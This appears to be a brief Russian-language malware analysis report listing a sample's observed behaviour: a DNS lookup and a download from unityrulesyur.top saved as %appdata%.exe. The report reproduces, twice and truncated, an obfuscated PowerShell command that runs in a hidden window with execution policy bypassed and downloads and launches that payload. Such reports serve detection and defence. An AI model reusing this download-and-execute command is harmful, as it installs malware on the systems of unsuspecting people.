Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powERshell.eXe -ExECutIoNpolIcY BYpASS -noPROfILe -wInDOWSTYLe hIDdEN (nEW-OBjECT SYstEM.NeT.wEBcLiENt).doWnlOADFIlE('http://unityrulesyur.top/search.php','%appData%.Exe');stA...
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /C "powERshell.eXe -ExECutIoNpolIcY BYpASS -noPROfILe -wInDOWSTYLe hIDdEN (nEW-OBjECT SYstEM.NeT.wEBcLiENt).doWnlOADFIlE('http://unityrulesyur.top/search.php','%appData%.Exe');stA...' (со скрытым окном)